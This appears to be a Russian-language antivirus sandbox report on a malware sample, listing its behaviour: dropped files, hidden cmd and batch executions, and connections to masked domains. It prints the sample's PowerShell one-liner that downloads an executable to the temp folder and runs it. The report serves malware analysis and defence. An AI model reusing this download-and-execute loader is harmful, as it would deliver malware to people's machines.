Техническая информация
Вредоносные функции
Загружает и запускает на исполнение
- $lnk как %temp%\kticks.exe
Запускает на исполнение (эксплоит)
- '<SYSTEM32>\cmd.exe' /c PowerShell "'PowerShell ""function load([String] $lnk){(New-Object System.Net.WebClient).DownloadFile($lnk,''%TMP%\Kticks.exe'');Start-Process ''%TMP%\Kticks.exe'';}try{load(''http://pi####s...
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1488
Изменения в файловой системе
Создает следующие файлы
- %HOMEPATH%\application data\microsoft\forms\winword.box
- %TEMP%\1167183.cvr
- %TEMP%\whsjd.bat
Сетевая активность
Подключается к
- 'pi####svalencia.com':80
- 'ri###rbos.info':80
- 'ri###rbos.info':443
TCP
Запросы HTTP GET
- http://pi####svalencia.com/grazlocksa36.png
- http://ri###rbos.info/grazlocksa36.png
Другие
- 'ri###rbos.info':443
UDP
- DNS ASK pi####svalencia.com
- DNS ASK ri###rbos.info
Другое
Создает и запускает на исполнение
- '<SYSTEM32>\cmd.exe' /c PowerShell "'PowerShell ""function load([String] $lnk){(New-Object System.Net.WebClient).DownloadFile($lnk,''%TMP%\Kticks.exe'');Start-Process ''%TMP%\Kticks.exe'';}try{load(''http://pi####s...' (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /c ""%TEMP%\whsjd.bat" "' (со скрытым окном)
Запускает на исполнение
- '<SYSTEM32>\cmd.exe' /c ""%TEMP%\whsjd.bat" "
